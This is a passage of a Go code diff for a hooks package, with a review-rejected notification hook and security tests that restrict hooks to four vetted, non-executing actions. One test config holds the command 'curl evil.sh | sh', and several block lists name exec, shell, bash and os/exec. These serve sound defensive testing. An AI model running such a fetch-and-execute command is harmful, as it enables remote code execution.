+	if _, err := Compile([]Hook{{
+		Name: "p", On: TransitionGovernorModeChange, Action: ActionPause,
+		Params: map[string]string{"agent": "reviewer"},
+	}}); err != nil {
+		t.Errorf("explicit agent should be accepted: %v", err)
+	}
+}
+
+func TestCompileEmptyListIsValidAndNeverFires(t *testing.T) {
+	reg, err := Compile(nil)
+	if err != nil {
+		t.Fatalf("empty list should compile: %v", err)
+	}
+	if reg.Len() != 0 {
+		t.Errorf("expected empty registry, got %d", reg.Len())
+	}
+	if got := reg.For(TransitionReviewRejected); len(got) != 0 {
+		t.Errorf("empty registry must match nothing, got %d", len(got))
+	}
+}
+
+// TestCatalogAndActionsAreClosedSets pins the vocabularies so adding to either
+// is a deliberate, reviewed change rather than an accident.
+func TestCatalogAndActionsAreClosedSets(t *testing.T) {
+	wantTransitions := []Transition{
+		TransitionACMMLevelChange, TransitionAgentPaused, TransitionAgentResumed,
+		TransitionEscalationRed, TransitionGovernorModeChange, TransitionReviewRejected,
+		TransitionSweepCompleted, TransitionUpgradePause,
+	}
+	got := KnownTransitions()
+	if len(got) != len(wantTransitions) {
+		t.Errorf("catalog size changed: got %d, want %d — update docs too", len(got), len(wantTransitions))
+	}
+	for _, w := range wantTransitions {
+		if !IsKnownTransition(w) {
+			t.Errorf("transition %q missing from catalog", w)
+		}
+	}
+
+	// The action set must remain exactly the four vetted actions. In
+	// particular there must be no exec.
+	if len(KnownActions()) != 4 {
+		t.Errorf("action set changed: %v — this is a security review, not a refactor", KnownActions())
+	}
+	for _, forbidden := range []Action{"exec", "script", "shell", "run"} {
+		if IsVettedAction(forbidden) {
+			t.Errorf("%q must never be a vetted action in this slice", forbidden)
+		}
+	}
+}
+
+// TestEveryCatalogEntryIsDocumented keeps the catalog self-describing: a
+// transition with no doc or no fields would leave an operator unable to write
+// a predicate for it.
+func TestEveryCatalogEntryIsDocumented(t *testing.T) {
+	for _, name := range KnownTransitions() {
+		entry, ok := Describe(name)
+		if !ok {
+			t.Fatalf("%q not describable", name)
+		}
+		if strings.TrimSpace(entry.Doc) == "" {
+			t.Errorf("%q has no doc", name)
+		}
+		if len(entry.Fields) == 0 {
+			t.Errorf("%q documents no payload fields", name)
+		}
+		if entry.Name != name {
+			t.Errorf("%q catalog entry has mismatched Name %q", name, entry.Name)
+		}
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Rate limiter
+// ---------------------------------------------------------------------------
+
+func TestRateLimiterEnforcesCeilingAndRecovers(t *testing.T) {
+	rl := newRateLimiter()
+	base := time.Date(2026, 8, 12, 10, 0, 0, 0, time.UTC)
+
+	// The first `limit` firings pass; the next is refused.
+	const limit = 3
+	for i := 0; i < limit; i++ {
+		if !rl.allow("h", limit, base.Add(time.Duration(i)*time.Second)) {
+			t.Fatalf("firing %d should be allowed", i)
+		}
+	}
+	if rl.allow("h", limit, base.Add(4*time.Second)) {
+		t.Error("firing over the ceiling should be refused")
+	}
+
+	// Once the window slides past the earlier firings, capacity returns.
+	if !rl.allow("h", limit, base.Add(61*time.Second)) {
+		t.Error("capacity should recover after the window slides")
+	}
+}
+
+func TestRateLimiterIsPerHook(t *testing.T) {
+	rl := newRateLimiter()
+	now := time.Now()
+	if !rl.allow("a", 1, now) || !rl.allow("b", 1, now) {
+		t.Fatal("distinct hooks must have independent buckets")
+	}
+	if rl.allow("a", 1, now) {
+		t.Error("hook a should now be limited")
+	}
+	if rl.allow("b", 1, now) {
+		t.Error("hook b should now be limited")
+	}
+}
+
+func TestEffectiveRateLimitDefaults(t *testing.T) {
+	if got := (Hook{}).effectiveRateLimit(); got != DefaultRateLimitPerMinute {
+		t.Errorf("unset limit should default to %d, got %d", DefaultRateLimitPerMinute, got)
+	}
+	if got := (Hook{RateLimitPerMinute: 5}).effectiveRateLimit(); got != 5 {
+		t.Errorf("explicit limit should be honored, got %d", got)
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Signature / hot reload
+// ---------------------------------------------------------------------------
+
+func TestSignatureDetectsChangesAndIgnoresParamOrder(t *testing.T) {
+	a := []Hook{{
+		Name: "h", On: TransitionReviewRejected, Action: ActionNotify,
+		Params: map[string]string{"title": "T", "priority": "high"},
+	}}
+	b := []Hook{{
+		Name: "h", On: TransitionReviewRejected, Action: ActionNotify,
+		Params: map[string]string{"priority": "high", "title": "T"},
+	}}
+	if Signature(a) != Signature(b) {
+		t.Error("param map order must not change the signature (YAML maps are unordered)")
+	}
+
+	changed := []Hook{{
+		Name: "h", On: TransitionReviewRejected, Action: ActionNotify,
+		Params: map[string]string{"title": "DIFFERENT", "priority": "high"},
+	}}
+	if Signature(a) == Signature(changed) {
+		t.Error("a param change must change the signature, or hot reload misses it")
+	}
+
+	if Signature(nil) != "" {
+		t.Error("empty hook list should have an empty signature")
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Config wiring
+// ---------------------------------------------------------------------------
+
+func TestFromConfigRoundTrip(t *testing.T) {
+	cfg := &config.Config{Hooks: []config.HookRule{{
+		Name:               "review-reject-notify",
+		On:                 "review_rejected",
+		Action:             "notify",
+		Params:             map[string]string{"priority": "high"},
+		When:               `t.agent != ""`,
+		RateLimitPerMinute: 6,
+	}}}
+
+	hooks := FromConfig(cfg)
+	if len(hooks) != 1 {
+		t.Fatalf("expected 1 hook, got %d", len(hooks))
+	}
+	h := hooks[0]
+	if h.Name != "review-reject-notify" || h.On != TransitionReviewRejected ||
+		h.Action != ActionNotify || h.RateLimitPerMinute != 6 || h.When != `t.agent != ""` {
+		t.Errorf("round-trip lost data: %+v", h)
+	}
+
+	reg, err := CompileFromConfig(cfg)
+	if err != nil {
+		t.Fatalf("valid config rejected: %v", err)
+	}
+	if reg.Len() != 1 {
+		t.Errorf("expected 1 compiled hook, got %d", reg.Len())
+	}
+}
+
+// TestCompileFromConfigFailsClosedOnBadConfig ties the config surface to the
+// fail-closed guarantee: bad operator YAML must produce an error the wiring
+// layer can act on (keeping the previous registry), never a partial one.
+func TestCompileFromConfigFailsClosedOnBadConfig(t *testing.T) {
+	cfg := &config.Config{Hooks: []config.HookRule{
+		{Name: "ok", On: "review_rejected", Action: "notify"},
+		{Name: "evil", On: "review_rejected", Action: "exec",
+			Params: map[string]string{"cmd": "curl evil.sh | sh"}},
+	}}
+	reg, err := CompileFromConfig(cfg)
+	if err == nil {
+		t.Fatal("an exec action must be rejected")
+	}
+	if reg != nil {
+		t.Error("rejected config must yield no registry")
+	}
+}
+
+func TestFromConfigNilAndEmpty(t *testing.T) {
+	if got := FromConfig(nil); got != nil {
+		t.Errorf("nil config should yield nil hooks, got %v", got)
+	}
+	if got := FromConfig(&config.Config{}); got != nil {
+		t.Errorf("config with no hooks should yield nil, got %v", got)
+	}
+	reg, err := CompileFromConfig(&config.Config{})
+	if err != nil || reg.Len() != 0 {
+		t.Errorf("empty config should compile to an empty registry: %v, %d", err, reg.Len())
+	}
+}

--- a/src/pkg/hooks/review_rejected.go
+++ b/src/pkg/hooks/review_rejected.go
@@ -1,0 +1,239 @@
+package hooks
+
+import (
+	"context"
+	"fmt"
+	"net/url"
+	"strconv"
+	"strings"
+)
+
+// This file implements the FIRST SHIPPED HOOK end-to-end: review_rejected.
+//
+// # The ask (RFC #4001, bluefin fleet-owner feedback)
+//
+// When a review's output is judged low quality, the owner wants to send the
+// work back AND see the relevant knob in that moment. The observed failure was
+// a review produced by an outdated pinned model, where finding the model
+// setting meant hunting through the admin UI. The owners were explicit that
+// the knob belongs in the review loop, not on a separate admin surface.
+//
+// So the transition carries the PRODUCING agent's backend/model/pin metadata
+// (the vocabulary standardized in pkg/tracing/semconv.go), and the notification
+// this hook sends deep-links straight to that agent's model-pin control.
+//
+// It exercises the entire pipeline — transition emission with typed payload,
+// declarative registration, CEL predicate, action dispatch, audit trail — with
+// a notify-only action, i.e. zero mutation risk.
+
+// ReviewRejection is the input an emitting site supplies when a human rejects
+// a review's output. It is a purpose-built struct rather than a raw Payload so
+// the emitter cannot forget the model metadata that is the entire point of the
+// transition: the fields are named and the constructor fills the rest.
+type ReviewRejection struct {
+	// Agent is the agent whose output was rejected. Required — without it the
+	// notification cannot name a model knob to link.
+	Agent string
+	// Repo is the repository, e.g. "org/name".
+	Repo string
+	// PRNumber is the pull request whose review was rejected, 0 when unknown.
+	PRNumber int
+	// Actor is the human who rejected it.
+	Actor string
+	// Reason is the operator's stated reason ("hallucinated the API", …).
+	Reason string
+
+	// Backend, Model, and Pin identify what PRODUCED the rejected output.
+	// These are the fields that make the notification actionable.
+	Backend string
+	Model   string
+	Pin     string
+	// ACMMLevel is the autonomy level in effect, 0 when unknown.
+	ACMMLevel int
+
+	// DashboardBaseURL is the hive dashboard's external base URL, used to
+	// build the model-knob deep link. When empty the notification still sends,
+	// naming the model but without a link — degraded, not broken.
+	DashboardBaseURL string
+}
+
+// modelKnobPath is the dashboard route that focuses an agent's model/pin
+// control. Kept as a named constant next to the link builder so the coupling
+// to the dashboard's routing is in exactly one place and shows up in a grep
+// for the route.
+const modelKnobPath = "/agents"
+
+// ModelKnobURL builds the deep link to the producing agent's model-pin knob —
+// the "surface the tuning knob in-context" half of the fleet-owner ask.
+//
+// Returns "" when there is no base URL or no agent, in which case the
+// notification degrades to naming the model without linking it.
+func ModelKnobURL(baseURL, agent string) string {
+	base := strings.TrimRight(strings.TrimSpace(baseURL), "/")
+	if base == "" || strings.TrimSpace(agent) == "" {
+		return ""
+	}
+	// The agent name lands in a query parameter, so it must be escaped: an
+	// agent named with a `&` or a space would otherwise truncate or corrupt
+	// the link.
+	return fmt.Sprintf("%s%s?agent=%s&focus=model", base, modelKnobPath, url.QueryEscape(agent))
+}
+
+// Attribute keys carried in a review_rejected payload's Attrs.
+const (
+	// AttrPR is the pull request number, as a string.
+	AttrPR = "pr"
+	// AttrModelKnobURL is the deep link to the producing agent's model knob.
+	AttrModelKnobURL = "model_knob_url"
+)
+
+// NewReviewRejectedPayload builds the review_rejected transition payload.
+//
+// Causation is left at depth 0: a human rejecting a review is a
+// world-originated transition, so its hooks are allowed to fire.
+func NewReviewRejectedPayload(r ReviewRejection) Payload {
+	attrs := map[string]string{}
+	if r.PRNumber > 0 {
+		attrs[AttrPR] = strconv.Itoa(r.PRNumber)
+	}
+	if knob := ModelKnobURL(r.DashboardBaseURL, r.Agent); knob != "" {
+		attrs[AttrModelKnobURL] = knob
+	}
+	return Payload{
+		Transition: TransitionReviewRejected,
+		Agent:      r.Agent,
+		Repo:       r.Repo,
+		Actor:      r.Actor,
+		Reason:     r.Reason,
+		Backend:    r.Backend,
+		Model:      r.Model,
+		Pin:        r.Pin,
+		ACMMLevel:  r.ACMMLevel,
+		Attrs:      attrs,
+	}
+}
+
+// EmitReviewRejected is the emitter a review surface calls when a human rejects
+// output. It builds the payload and fires the transition.
+//
+// Call it AFTER the rejection is durably recorded, consistent with the
+// post-commit rule that applies to every transition.
+func EmitReviewRejected(ctx context.Context, d *Dispatcher, r ReviewRejection) {
+	if d == nil {
+		return
+	}
+	d.Fire(ctx, NewReviewRejectedPayload(r))
+}
+
+// ---------------------------------------------------------------------------
+// Notification rendering
+// ---------------------------------------------------------------------------
+
+// renderNotification builds the title and body for a notify action.
+//
+// An operator may override either via params.title / params.message. When they
+// do not, the default rendering is transition-aware, and for review_rejected it
+// produces the in-context model affordance the RFC asks for: the body names the
+// model and pin that produced the rejected output and links its knob directly.
+func renderNotification(h Hook, p Payload) (title, message string) {
+	title = firstNonEmpty(h.Params["title"], defaultNotificationTitle(p))
+	if custom := strings.TrimSpace(h.Params["message"]); custom != "" {
+		return title, custom
+	}
+	return title, defaultNotificationBody(p)
+}
+
+// defaultNotificationTitle names the transition in operator-facing terms.
+func defaultNotificationTitle(p Payload) string {
+	if p.Transition == TransitionReviewRejected {
+		if p.Agent != "" {
+			return fmt.Sprintf("Review rejected: %s", p.Agent)
+		}
+		return "Review rejected"
+	}
+	if p.Agent != "" {
+		return fmt.Sprintf("%s: %s", p.Transition, p.Agent)
+	}
+	return string(p.Transition)
+}
+
+// defaultNotificationBody renders the transition's context. For
+// review_rejected it leads with the model metadata and the knob link, because
+// that is the information the fleet owner needed and could not find.
+func defaultNotificationBody(p Payload) string {
+	var b strings.Builder
+
+	if p.Transition == TransitionReviewRejected {
+		if pr := p.attr(AttrPR); pr != "" && p.Repo != "" {
+			fmt.Fprintf(&b, "%s#%s review rejected", p.Repo, pr)
+		} else if p.Repo != "" {
+			fmt.Fprintf(&b, "%s review rejected", p.Repo)
+		} else {
+			b.WriteString("Review rejected")
+		}
+		if p.Actor != "" {
+			fmt.Fprintf(&b, " by %s", p.Actor)
+		}
+		b.WriteString(".\n")
+		if p.Reason != "" {
+			fmt.Fprintf(&b, "Reason: %s\n", p.Reason)
+		}
+
+		// The producing model — the part that makes this actionable.
+		if desc := describeModel(p); desc != "" {
+			fmt.Fprintf(&b, "Produced by %s\n", desc)
+		}
+		if knob := p.attr(AttrModelKnobURL); knob != "" {
+			fmt.Fprintf(&b, "Adjust the model pin: %s", knob)
+		}
+		return strings.TrimRight(b.String(), "\n")
+	}
+
+	// Generic rendering for every other transition.
+	fmt.Fprintf(&b, "Transition: %s", p.Transition)
+	if p.From != "" || p.To != "" {
+		fmt.Fprintf(&b, "\n%s → %s", orDash(p.From), orDash(p.To))
+	}
+	if p.Agent != "" {
+		fmt.Fprintf(&b, "\nAgent: %s", p.Agent)
+	}
+	if p.Repo != "" {
+		fmt.Fprintf(&b, "\nRepo: %s", p.Repo)
+	}
+	if p.Trigger != "" {
+		fmt.Fprintf(&b, "\nTrigger: %s", p.Trigger)
+	}
+	if p.Reason != "" {
+		fmt.Fprintf(&b, "\nReason: %s", p.Reason)
+	}
+	return b.String()
+}
+
+// describeModel renders the producing model in the form an operator recognizes
+// from the admin UI: "backend/model (pin: X)", omitting whatever is unknown.
+func describeModel(p Payload) string {
+	var parts []string
+	switch {
+	case p.Backend != "" && p.Model != "":
+		parts = append(parts, p.Backend+"/"+p.Model)
+	case p.Model != "":
+		parts = append(parts, p.Model)
+	case p.Backend != "":
+		parts = append(parts, p.Backend)
+	}
+	if len(parts) == 0 {
+		return ""
+	}
+	if p.Pin != "" {
+		parts = append(parts, fmt.Sprintf("(pin: %s)", p.Pin))
+	}
+	return strings.Join(parts, " ")
+}
+
+// orDash renders an empty state as "—" so a one-sided transition still reads.
+func orDash(s string) string {
+	if s == "" {
+		return "—"
+	}
+	return s
+}

--- a/src/pkg/hooks/review_rejected_test.go
+++ b/src/pkg/hooks/review_rejected_test.go
@@ -1,0 +1,220 @@
+package hooks
+
+import (
+	"context"
+	"strings"
+	"testing"
+
+	"github.com/kubestellar/hive/pkg/config"
+)
+
+// TestReviewRejectedEndToEndCarriesModelMetadata is the acceptance test for the
+// first shipped hook (RFC #4001's bluefin fleet-owner ask). It drives the FULL
+// pipeline exactly as production would — operator YAML → validated registry →
+// emitter → post-commit dispatch → notification → audit — and asserts the thing
+// the ask is actually about: the notification names the model that produced the
+// rejected output and links its tuning knob, so the owner does not have to hunt
+// through the admin UI.
+func TestReviewRejectedEndToEndCarriesModelMetadata(t *testing.T) {
+	// 1. The operator's config, as it would appear in the PVC hive.yaml.
+	cfg := &config.Config{Hooks: []config.HookRule{{
+		Name:   "review-rejected-notify",
+		On:     "review_rejected",
+		Action: "notify",
+		Params: map[string]string{"priority": "high"},
+	}}}
+
+	reg, err := CompileFromConfig(cfg)
+	if err != nil {
+		t.Fatalf("the shipped default hook must validate: %v", err)
+	}
+
+	notifier := &fakeNotifier{}
+	audit := &fakeAudit{}
+	d := NewDispatcher(reg, quietLogger(), WithNotifier(notifier), WithAuditSink(audit))
+
+	// 2. A human rejects a review whose output came from a stale pinned model.
+	EmitReviewRejected(context.Background(), d, ReviewRejection{
+		Agent:            "reviewer",
+		Repo:             "kubestellar/hive",
+		PRNumber:         4001,
+		Actor:            "fleet-owner",
+		Reason:           "hallucinated the API surface",
+		Backend:          "anthropic",
+		Model:            "claude-opus-4",
+		Pin:              "20240229",
+		ACMMLevel:        4,
+		DashboardBaseURL: "https://hive.example.com",
+	})
+	d.Wait()
+
+	// 3. Exactly one notification, at the configured priority.
+	sent := notifier.all()
+	if len(sent) != 1 {
+		t.Fatalf("expected 1 notification, got %d", len(sent))
+	}
+	n := sent[0]
+	if n.priority != "high" {
+		t.Errorf("priority param not honored: %q", n.priority)
+	}
+	if !strings.Contains(n.title, "reviewer") {
+		t.Errorf("title should name the agent, got %q", n.title)
+	}
+
+	// 4. THE POINT OF THE HOOK: the body carries the producing model, its pin,
+	// and a working deep link to the knob.
+	for _, want := range []string{
+		"claude-opus-4",                // the model that produced the bad output
+		"anthropic",                    // its backend
+		"20240229",                     // the stale pin
+		"hallucinated the API surface", // the rejection reason
+		"kubestellar/hive#4001",        // what was rejected
+		"fleet-owner",                  // who rejected it
+	} {
+		if !strings.Contains(n.message, want) {
+			t.Errorf("notification body missing %q\nbody:\n%s", want, n.message)
+		}
+	}
+
+	wantKnob := "https://hive.example.com/agents?agent=reviewer&focus=model"
+	if !strings.Contains(n.message, wantKnob) {
+		t.Errorf("notification must deep-link the model knob %q\nbody:\n%s", wantKnob, n.message)
+	}
+
+	// 5. The firing is audited WITH the model metadata, so the audit log alone
+	// answers "which model produced the rejected output".
+	entries := audit.withAction(AuditHookFired)
+	if len(entries) != 1 {
+		t.Fatalf("expected 1 audit entry, got %d", len(entries))
+	}
+	for k, want := range map[string]string{
+		"model": "claude-opus-4", "backend": "anthropic", "pin": "20240229",
+		"transition": "review_rejected", "hook": "review-rejected-notify",
+	} {
+		if got, _ := entries[0].fields[k].(string); got != want {
+			t.Errorf("audit field %q: got %q, want %q", k, got, want)
+		}
+	}
+}
+
+// TestReviewRejectedPayloadShape pins the emitter's mapping, including that a
+// human rejection is world-caused (depth 0) and so is allowed to fire hooks.
+func TestReviewRejectedPayloadShape(t *testing.T) {
+	p := NewReviewRejectedPayload(ReviewRejection{
+		Agent: "reviewer", Repo: "o/r", PRNumber: 7, Actor: "human",
+		Reason: "wrong", Backend: "anthropic", Model: "m", Pin: "p", ACMMLevel: 3,
+		DashboardBaseURL: "https://h.example.com",
+	})
+
+	if p.Transition != TransitionReviewRejected {
+		t.Errorf("wrong transition: %q", p.Transition)
+	}
+	if p.Causation.Depth != 0 {
+		t.Errorf("a human rejection is world-caused; depth must be 0, got %d", p.Causation.Depth)
+	}
+	if p.Model != "m" || p.Backend != "anthropic" || p.Pin != "p" || p.ACMMLevel != 3 {
+		t.Errorf("model metadata lost: %+v", p)
+	}
+	if p.attr(AttrPR) != "7" {
+		t.Errorf("PR number should be in attrs, got %q", p.attr(AttrPR))
+	}
+	if p.attr(AttrModelKnobURL) == "" {
+		t.Error("knob URL should be precomputed into attrs")
+	}
+}
+
+// TestModelKnobURLEscapesAgentName: an agent name with URL-significant
+// characters must not corrupt or truncate the link.
+func TestModelKnobURLEscapesAgentName(t *testing.T) {
+	got := ModelKnobURL("https://h.example.com", "weird name&focus=evil")
+	if strings.Contains(got, "weird name") {
+		t.Errorf("agent name must be escaped, got %q", got)
+	}
+	if strings.Count(got, "focus=model") != 1 || strings.Contains(got, "focus=evil") {
+		t.Errorf("unescaped input altered the query, got %q", got)
+	}
+}
+
+func TestModelKnobURLDegradesGracefully(t *testing.T) {
+	if got := ModelKnobURL("", "reviewer"); got != "" {
+		t.Errorf("no base URL should yield no link, got %q", got)
+	}
+	if got := ModelKnobURL("https://h.example.com", ""); got != "" {
+		t.Errorf("no agent should yield no link, got %q", got)
+	}
+	// A trailing slash must not double up.
+	if got := ModelKnobURL("https://h.example.com/", "a"); strings.Contains(got, "com//") {
+		t.Errorf("trailing slash mishandled: %q", got)
+	}
+}
+
+// TestReviewRejectedWithoutDashboardURLStillNotifies: missing config degrades
+// the notification, it does not break it.
+func TestReviewRejectedWithoutDashboardURLStillNotifies(t *testing.T) {
+	notifier := &fakeNotifier{}
+	d := NewDispatcher(
+		mustRegistry(t, Hook{
+			Name: "n", On: TransitionReviewRejected, Action: ActionNotify,
+		}),
+		quietLogger(), WithNotifier(notifier))
+
+	EmitReviewRejected(context.Background(), d, ReviewRejection{
+		Agent: "reviewer", Model: "claude-opus-4", Pin: "20240229",
+		// No DashboardBaseURL.
+	})
+	d.Wait()
+
+	sent := notifier.all()
+	if len(sent) != 1 {
+		t.Fatalf("expected 1 notification, got %d", len(sent))
+	}
+	if !strings.Contains(sent[0].message, "claude-opus-4") {
+		t.Errorf("model should still be named without a base URL:\n%s", sent[0].message)
+	}
+	if strings.Contains(sent[0].message, "Adjust the model pin") {
+		t.Errorf("no link should be offered when none can be built:\n%s", sent[0].message)
+	}
+}
+
+func TestEmitReviewRejectedNilDispatcherIsSafe(t *testing.T) {
+	EmitReviewRejected(context.Background(), nil, ReviewRejection{Agent: "a"})
+}
+
+func TestDescribeModelRendering(t *testing.T) {
+	cases := []struct {
+		name string
+		p    Payload
+		want string
+	}{
+		{"full", Payload{Backend: "anthropic", Model: "m", Pin: "p"}, "anthropic/m (pin: p)"},
+		{"no pin", Payload{Backend: "anthropic", Model: "m"}, "anthropic/m"},
+		{"model only", Payload{Model: "m"}, "m"},
+		{"backend only", Payload{Backend: "anthropic"}, "anthropic"},
+		{"empty", Payload{}, ""},
+	}
+	for _, tc := range cases {
+		if got := describeModel(tc.p); got != tc.want {
+			t.Errorf("%s: got %q, want %q", tc.name, got, tc.want)
+		}
+	}
+}
+
+// TestGenericNotificationBodyForOtherTransitions checks the non-review
+// rendering path still produces something useful.
+func TestGenericNotificationBodyForOtherTransitions(t *testing.T) {
+	body := defaultNotificationBody(Payload{
+		Transition: TransitionGovernorModeChange,
+		From:       "normal", To: "conserve", Reason: "budget",
+	})
+	for _, want := range []string{"governor_mode_change", "normal", "conserve", "budget"} {
+		if !strings.Contains(body, want) {
+			t.Errorf("generic body missing %q:\n%s", want, body)
+		}
+	}
+
+	// A one-sided transition still reads.
+	oneSided := defaultNotificationBody(Payload{Transition: TransitionUpgradePause, To: "on"})
+	if !strings.Contains(oneSided, "—") {
+		t.Errorf("expected a dash for the empty side:\n%s", oneSided)
+	}
+}

--- a/src/pkg/hooks/security_test.go
+++ b/src/pkg/hooks/security_test.go
@@ -1,0 +1,312 @@
+package hooks
+
+import (
+	"context"
+	"go/ast"
+	"go/parser"
+	"go/token"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/kubestellar/hive/pkg/config"
+)
+
+// This file asserts the SECURITY INVARIANTS of RFC #4001 against the source
+// and the API, not merely against behavior a future refactor could quietly
+// drop. Several tests read the package's own AST: a test that only exercised
+// the happy path would keep passing if someone added an exec action or a
+// runtime registration endpoint, which is exactly the regression that matters.
+
+// ---------------------------------------------------------------------------
+// Operator-only registration (authz)
+// ---------------------------------------------------------------------------
+
+// TestRegistrationIsConfigOnly_NoRuntimeRegistrationAPI is the authz test.
+//
+// Hooks are operator-only BY CONSTRUCTION: the sole way to register one is to
+// write the `hooks:` block in the PVC-backed config, which already requires
+// operator authz and records layer provenance. This test proves the package
+// exposes no alternative path — no exported Register/Add/Install function that
+// an HTTP handler, an agent-reachable API, or any non-operator caller could
+// use to add a hook at runtime.
+//
+// A non-operator therefore cannot register a hook because there is no API to
+// call, which is a stronger guarantee than a permission check that could be
+// mounted on the wrong route.
+func TestRegistrationIsConfigOnly_NoRuntimeRegistrationAPI(t *testing.T) {
+	fset := token.NewFileSet()
+	pkgs, err := parser.ParseDir(fset, ".", func(fi os.FileInfo) bool {
+		return !strings.HasSuffix(fi.Name(), "_test.go")
+	}, 0)
+	if err != nil {
+		t.Fatalf("parse package: %v", err)
+	}
+
+	// Names that would constitute a runtime registration path. SetRegistry is
+	// deliberately excluded: it swaps a WHOLE COMPILED REGISTRY built from
+	// validated config (hot reload), and cannot add an individual unvalidated
+	// hook.
+	forbidden := []string{
+		"Register", "RegisterHook", "AddHook", "InstallHook",
+		"AppendHook", "CreateHook", "NewHookFromRequest",
+	}
+
+	for _, pkg := range pkgs {
+		for path, file := range pkg.Files {
+			for _, decl := range file.Decls {
+				fn, ok := decl.(*ast.FuncDecl)
+				if !ok || !fn.Name.IsExported() {
+					continue
+				}
+				for _, bad := range forbidden {
+					if fn.Name.Name == bad {
+						t.Errorf("%s declares exported %s: hooks must be registrable "+
+							"ONLY through operator config, never a runtime API",
+							filepath.Base(path), fn.Name.Name)
+					}
+				}
+			}
+		}
+	}
+}
+
+// TestOnlyConfigCanProduceARegistry documents the single supported ingress:
+// a Registry comes from Compile over validated hooks, and the config path
+// (CompileFromConfig) is the only one wired into the running system.
+func TestOnlyConfigCanProduceARegistry(t *testing.T) {
+	// The config path works…
+	reg, err := CompileFromConfig(&config.Config{Hooks: []config.HookRule{{
+		Name: "ok", On: "review_rejected", Action: "notify",
+	}}})
+	if err != nil || reg.Len() != 1 {
+		t.Fatalf("config registration should work: %v", err)
+	}
+
+	// …and it is gated by the same fail-closed validation regardless of who
+	// wrote the YAML, so a malicious or mistaken config cannot smuggle in an
+	// unvetted action.
+	if _, err := CompileFromConfig(&config.Config{Hooks: []config.HookRule{{
+		Name: "evil", On: "review_rejected", Action: "exec",
+	}}}); err == nil {
+		t.Error("validation must apply to every config-registered hook")
+	}
+}
+
+// TestHooksAppearInConfigProvenance: because a hook can pause an agent, WHICH
+// LAYER declared it is security-relevant and must be visible in the provenance
+// report — the same accountability every other operator config field has.
+func TestHooksAppearInConfigProvenance(t *testing.T) {
+	cfg := &config.Config{Hooks: []config.HookRule{
+		{Name: "pause-on-red", On: "escalation_red", Action: "pause"},
+	}}
+	prov := config.NewProvenance()
+	prov.Set("hooks.pause-on-red", config.LayerDashboardOverlay)
+
+	var found bool
+	for _, fo := range prov.Report(cfg) {
+		if fo.Field == "hooks.pause-on-red" {
+			found = true
+			if !strings.Contains(fo.Value, "escalation_red") ||
+				!strings.Contains(fo.Value, "pause") {
+				t.Errorf("provenance should describe the rule, got %q", fo.Value)
+			}
+		}
+	}
+	if !found {
+		t.Error("a registered hook must appear in the config provenance report")
+	}
+}
+
+// ---------------------------------------------------------------------------
+// No arbitrary code execution
+// ---------------------------------------------------------------------------
+
+// TestNoExecCapabilityInActionSet is the "why no exec" invariant, asserted
+// three ways so it cannot regress silently.
+func TestNoExecCapabilityInActionSet(t *testing.T) {
+	// 1. The vetted set contains exactly the four declarative actions.
+	got := KnownActions()
+	want := []Action{ActionAnnotate, ActionEnqueueApproval, ActionNotify, ActionPause}
+	if len(got) != len(want) {
+		t.Fatalf("action set changed to %v — adding an action is a security review", got)
+	}
+	for i := range want {
+		if got[i] != want[i] {
+			t.Errorf("action %d: got %q, want %q", i, got[i], want[i])
+		}
+	}
+
+	// 2. Every plausible spelling of code execution is refused at validation.
+	for _, name := range []string{
+		"exec", "Exec", "EXEC", "script", "shell", "run", "command",
+		"bash", "sh", "eval", "webhook", "http",
+	} {
+		if IsVettedAction(Action(name)) {
+			t.Errorf("%q must not be a vetted action", name)
+		}
+		if _, err := Compile([]Hook{{
+			Name: "h", On: TransitionReviewRejected, Action: Action(name),
+		}}); err == nil {
+			t.Errorf("a hook with action %q must be rejected", name)
+		}
+	}
+}
+
+// TestPackageDoesNotImportProcessExecution proves the absence of exec
+// structurally: pkg/hooks must never import os/exec or syscall, so no action —
+// present or future — can shell out without this test failing first.
+func TestPackageDoesNotImportProcessExecution(t *testing.T) {
+	fset := token.NewFileSet()
+	pkgs, err := parser.ParseDir(fset, ".", func(fi os.FileInfo) bool {
+		return !strings.HasSuffix(fi.Name(), "_test.go")
+	}, 0)
+	if err != nil {
+		t.Fatalf("parse package: %v", err)
+	}
+
+	banned := map[string]string{
+		`"os/exec"`:       "process execution",
+		`"syscall"`:       "raw syscalls",
+		`"plugin"`:        "dynamic code loading",
+		`"net/http/cgi"`:  "CGI execution",
+		`"text/template"`: "template execution (injection surface)",
+	}
+
+	for _, pkg := range pkgs {
+		for path, file := range pkg.Files {
+			for _, imp := range file.Imports {
+				if why, bad := banned[imp.Path.Value]; bad {
+					t.Errorf("%s imports %s (%s): pkg/hooks must have no code-execution "+
+						"capability — exec is a separate RFC with its own sandbox story",
+						filepath.Base(path), imp.Path.Value, why)
+				}
+			}
+		}
+	}
+}
+
+// TestMutationSurfaceIsExactlyTheDeclaredSinks pins the complete set of ways a
+// hook can affect the system. Every mutating action must go through one of
+// these narrow, injected, audited interfaces — never a raw state write.
+func TestMutationSurfaceIsExactlyTheDeclaredSinks(t *testing.T) {
+	// A dispatcher with NO sinks wired can do nothing at all: every action
+	// fails rather than falling back to some direct write.
+	audit := &fakeAudit{}
+	d := NewDispatcher(
+		mustRegistry(t,
+			Hook{Name: "a", On: TransitionReviewRejected, Action: ActionNotify},
+			Hook{Name: "b", On: TransitionReviewRejected, Action: ActionAnnotate},
+			Hook{Name: "c", On: TransitionReviewRejected, Action: ActionEnqueueApproval},
+			Hook{Name: "d", On: TransitionReviewRejected, Action: ActionPause,
+				Params: map[string]string{"agent": "x"}},
+		),
+		quietLogger(), WithAuditSink(audit))
+
+	d.Fire(context.Background(), Payload{Transition: TransitionReviewRejected, Agent: "a"})
+	d.Wait()
+
+	// All four must FAIL — there is no unwired fallback path that mutates.
+	if got := len(audit.withAction(AuditHookFailed)); got != 4 {
+		t.Errorf("with no sinks wired every action must fail (no direct-write fallback), got %d failures", got)
+	}
+	if got := len(audit.withAction(AuditHookFired)); got != 0 {
+		t.Errorf("nothing should succeed with no sinks wired, got %d", got)
+	}
+}
+
+// TestPauserInterfaceOffersNoUnpause: a hook may stop work, but resuming it is
+// a human decision, so the injected pause API deliberately has no resume.
+func TestPauserInterfaceOffersNoUnpause(t *testing.T) {
+	fset := token.NewFileSet()
+	file, err := parser.ParseFile(fset, "action.go", nil, 0)
+	if err != nil {
+		t.Fatalf("parse action.go: %v", err)
+	}
+
